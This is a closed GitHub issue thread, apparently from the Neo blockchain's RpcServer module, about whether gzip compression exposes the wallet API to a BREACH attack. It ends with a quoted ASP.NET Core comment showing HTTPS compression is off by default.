Closed cschuchardt88 closed 1 year ago
// Summary:
// Indicates if responses over HTTPS connections should be compressed. The default
// is 'false'. Enabling compression on HTTPS requests for remotely manipulable content
// may expose security problems.
//
// Remarks:
// This can be overridden per request using Microsoft.AspNetCore.Http.Features.IHttpsCompressionFeature.
Seems disabled by default
@shargon thx for clearing that up. Can we have the option to enable or disable it? Or change compression level?
Closing ... problem resolved.
Summary or problem description Having compression is a nice feature to have but there is one drawback. Security vulnerability of a BREACH attack.
With a server with the wallet api enable this could be deadly. An Attacker could inject malicious text into a request to send NEO, GAS -- worst case scenario
Read More about it here https://www.breachattack.com/
Do you have any solution you want to propose? Remove GZip command from server or have the an option to configure it on or off. Let the user choose to enable or disable it.
https://github.com/neo-project/neo-modules/blob/99ffc846e4df93491d1d812cb4c6ef6ee875e056/src/RpcServer/RpcServer.cs#L132
https://github.com/neo-project/neo-modules/blob/99ffc846e4df93491d1d812cb4c6ef6ee875e056/src/RpcServer/RpcServer.cs#L140
Where in the software does this update applies to?